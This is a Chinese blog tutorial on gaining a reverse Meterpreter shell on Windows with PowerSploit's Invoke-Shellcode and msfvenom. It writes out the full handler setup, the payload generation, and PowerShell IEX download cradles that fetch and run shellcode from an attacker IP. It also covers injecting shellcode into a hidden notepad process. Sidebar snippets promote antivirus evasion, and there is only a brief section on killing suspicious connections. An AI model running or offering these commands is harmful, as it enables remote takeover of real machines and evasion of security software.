网络安全-powershell:powersploit Invoke-shellcode

已于 2022-05-06 16:00:22 修改
阅读量1.9k 收藏 6
点赞数 1
分类专栏: 网络安全 文章标签: 安全
于 2022-05-06 15:57:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013930899/article/details/124611729
版权

一、直接执行ShellCode反弹Meterpreter Shell

1. 设置msf

Msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_https  (一定要选择对应的位数,x64)

set LHOST 192.168.101.46

set LPORT 4444

Run

2. 生成powershell脚本木马

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.101.46 LPORT=4444 -f powershell -o /var/www/html/test3

3. 在目标机powershell执行以下命令

IEX(New-Object Net.WebClient).DownloadString("http://192.168.101.46/PowerSploit/CodeExecution/Invoke-Shellcode.ps1") #该命令将Invoke-Shellcode.psl脚本加载到内存,并未下载到本地

IEX(New-Object Net.WebClient).DownloadString("http://192.168.101.46/test3")

Invoke-Shellcode -Shellcode ($buf) -Force

备注:在执行上面的powershell脚本时,360报毒!!!

看msf控制台,发现反弹连接已经建立

4. 利用反弹连接

Sessions -i 1

ipconfig可以看出已经进入目标机器

5. 反向思维

在目标机器上执行应急响应的进程分析-可疑进程发现与关闭

计算机与外部网络通信是建立在TCP或UDP协议上的,并且每一次通信都是具有不同的端口(0-65535)。如果计算机被木马后,肯定会与外部网络通信,那么此时就可以通过查看网络连接状态,找到对应的进程ID,然后关闭进程ID就可以关闭连接状态。

netstat -ano |find "ESTABLISHED" 查看网络建立连接状态

tasklist /svc | find "PID" 查看具体PID进程对应的程序

taskkill /PID pid值 /T 关闭进程

二、指定进程注入ShellCode反弹Meterpreter Shell

1. 下载Invoke-Shellcode脚本

IEX(New-Object Net.WebClient).DownloadString("http://192.168.101.46/PowerSploit/CodeExecution/Invoke-Shellcode.ps1") 

2. 下载生成的shellcode脚本

 IEX (New-Object Net.WebClient).DownloadString("http://192.168.101.46/test3")

3. 启动一个notepad的进程

Start-Process c:\windows\system32\notepad.exe -WindowStyle Hidden

4. 查notepad的进程号

PS C:\Users\Administrator> Get-Process -Name "notepad"

5. 使用Invoke-Shellcode脚本进行进程注入

Invoke-Shellcode -ProcessID 2420 -Shellcode($buf) -Force

6. 返回msf查看反弹连接已经建立

見贤思齊
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Powershell免杀(远程加载shellcode)笔记
jackslowf的博客
06-24 2146
原文链接 远程加载的思路很简单,只需要将bin文件放到cs服务器上,利用远程读取shellcode的方式将恶意代码加载到内存执行即可。 下面代码直接从uri读取字节数组(对的,没仔细看) # remoteshell.ps1 Set-StrictMode -Version 2 function get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_paramete
juiced:生成通过PowerShell.NET在内存中执行shellcode的自定义有效负载
04-28
榨汁-最新版本为v1.8 Ruby脚本可将基于Matthew Graebers PowerShell Attacks(史诗般的帖子)和TrustedSec的修改结果输出到各种有效载荷格式中。 工具功能:该脚本将在Msfvenom格式化相应的选项,它发出的有效载荷(ie.windows/meterpreter/reverse_https)到msfvenom,修改接收到的shellcode,并且指定的负载类型中嵌入它。 当前的有效载荷格式:宏=散出功能齐全的复制/粘贴单词宏jar =将发布powershell语法的可执行jar文件* vbs =将发布powershell语法的可执行vbs文件* js =将执行powershell语法的可执行js文件发出powershell语法* ps =可以粘贴到命令提示符中的实际复制/可粘贴命令war =发出powershell语法的war文件* as
PowerSploitInvoke-ShellCode
weixin_46104215的博客
11-08 1538
Shellcode为16进制的机器码,根据不同的任务可能是发出一条系统调用或建立一个高权限的ShellShellcode也就由此得名。它的最终目的是取得目标机器的控制权。(一段用于利用软件漏洞而执行的代码) 反向连接的shellcode: 当目标计算机在防火墙后时,防火墙不允许外边的计算机主动访问目标机器。所以即使采用shellcode建立了服务后门,还是不能与目标计算机建立连接。反向连接的含义就是,让目标计算机通过特定的IP(攻击者的)和端口反向连接到攻击者,也可以设定为在固定的时间段主动来建立连接.
Power ShellInvoke-Expression ,Invoke-Expression -Command $activateCommand;错误或power shell激活虚拟环境报错失败
热门推荐
zbossz的学习小分队
07-17 1万+
powershell 一打开红字报错。 Invoke-Expression ,Invoke-Expression -Command $activateCommand;错误或power shell激活虚拟环境报错失败。
PowerSploitPowerSploit-PowerShell开发后框架
02-18
Invoke-Shellcodeshellcode注入您选择的进程ID或在本地PowerShell中。Invoke-WmiCommand 在目标计算机上执行PowerShell脚本块,并使用WMI作为C2通道返回其格式化输出。脚本修改修改和/或准备脚本以在受感染的...
Invoke-AltDSBackdoor:https
06-16
示例:PS C:\Users\test\Desktop> Invoke-ADSBackdoor -URL -Arguments "Invoke-Shellcode -Lhost 192.168.1.138 -LPort 2222 -Payload windows/meterpreter/ reverse_https -Force" 这将使用 Invoke-Shellcode.ps1...
obfuscation-stuff:源代码混淆和二进制混淆,多种语言和多种平台。 包括250多个工具和600多个帖子
05-16
invoke-obfuscation -> (1)工具 (7)文章 (9) 工具 (33) 文章 JavaScript javascript-obfuscator -> (7)工具 baffle -> (1)工具 jstillery -> (1)工具 (16) 工具 (64) 文章 LLVM obfuscator -> (7)工具 armariris -> ...
Invoke-AltDSBackdoor
05-04
示例:PS C:\ Users \ test \ Desktop> Invoke-ADSBackdoor -URL “ Invoke-Shellcode -Lhost 192.168.1.138 -LPort 2222 -Payload windows / meterpreter / reverse_https -Force“这将使用Invoke-Shellcode.ps1...
2020.04-远控免杀从入门到实践(6)-代码篇-Powershell1
08-03
在这里,我们将讨论使用 Powershell 实现免杀的技术,包括使用 Invoke-ShellcodeInvoke-Obfuscation 等技术来躲避安全软件和防火墙的检测。 4. Powershell安全风险 Powershell 是一个功能强大的 ...
批处理命令编写的浏览器源码,神奇的IEx
04-06
神奇的IEx,批处理命令编写的浏览器源码,开开眼界
Powershell免杀
mingyqf的博客
05-11 2396
Powershell免杀 本文作者:Chenw 本文链接:https://www.cnblogs.com/chen-w/p/14726549.html 0x01 前言 前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法。 后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。 0x02 Powershell免杀思路 先介绍一下powershell木马最常用的方式
cs在内网横向的使用(靶机)
sweetie 的博客
11-02 1547
1.cs上线目标 (1)设置监听器 添加监听 (2) 上线目标 如果目标可以出外网,我们可以使用让目标访问我们的cs服务器上的恶意代码,并下载执行,比较常见的就是使用如下图所使用的模块 根据目标的版本位数,选择是否要用 x64,点击执行后会出现如图所示窗口 复制代码(这里要选择x64的payload) powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http:///b'))"
我的powershell免杀之路
mingyqf的博客
05-17 1905
我的powershell免杀之路 ​ 原创 tubai
kali linux中meterpreter使用前的反弹shell及其基础语法
qq_42133828的博客
12-02 7890
一.反弹shell的类型: 1.reverse_tcp  (基于TCP反向链接反弹shell) 1).在kali linux终端中,生成一个反弹shell linux版: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=你kali本机的IP lport=随便选一个端口来接收信息 -f elf -o shell 如: msfveno...
Kali使用Metapsloit渗透win10 生成 payload 反弹shell
weixin_45908624的博客
07-19 2342
windows payload 反弹shell
远控免杀从入门到实践 (11) 终结篇
weixin_46236101的博客
03-13 1300
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础篇 2、远控免杀从入门到实践 (2)工具总结篇 3、远控免杀从入门到实践 (3)代码篇-C/C++ 4、远控免杀从入门到实践 (4)代码篇-C# 5、远控免杀从入门到实践 (5)代码篇-Python 6、远控免杀从入门到实践 (6)代码篇-Powershell 7、远控免杀从入门到实践
Powershell脚本加密以及持久化运行 + BMP隐藏Shellcode
weixin_30556959的博客
02-15 962
工欲善其事必先利其器本文所需工具:DKMC,PWSH,Invoke-Obfuscation,empire1.DKMC(生成图片木马后门)下载地址:https://github.com/Mr-Un1k0d3r/DKMC参考链接:https://blog.csdn.net/cloudatlasm/article/details/79039391 http://www.secist.com/archi...
无弹窗渗透实验
一个码农的笔记
09-02 5013
首先是内网的拓扑 拓扑说明: 【1】10.101.101.0/24的网段模拟的是外网的地址 【2】192.168.101.0/24的网段模拟的是一个小型企业的内网中的应用服务器网络 【3】192.168.111.0/24的网段模拟的是一个小型企业的内网中的办公网络 【4】企业内网可以无限制的访问到外网,但是外网无法访问到企业内网 【5】办公网可以无限制的访问到应用服务器网络,但是应用
ms-windows-store:PurgeCaches
最新发布
06-12
"ms-windows-store:PurgeCaches" 是一个Windows系统的命令行指令,它用于清空Windows应用商店(Microsoft Store)的缓存。 使用该命令可以清除Microsoft Store应用商店的缓存,以便重新加载和更新应用商店中的应用程序列表。这可以帮助解决一些与应用商店相关的问题,比如无法下载或安装应用程序、无法更新应用程序等问题。 要执行 "ms-windows-store:PurgeCaches" 命令,可以按下Win+X快捷键,选择“Windows PowerShell(管理员)”,在弹出的窗口中输入该命令,然后按回车键即可清空Microsoft Store应用商店的缓存。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

見贤思齊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值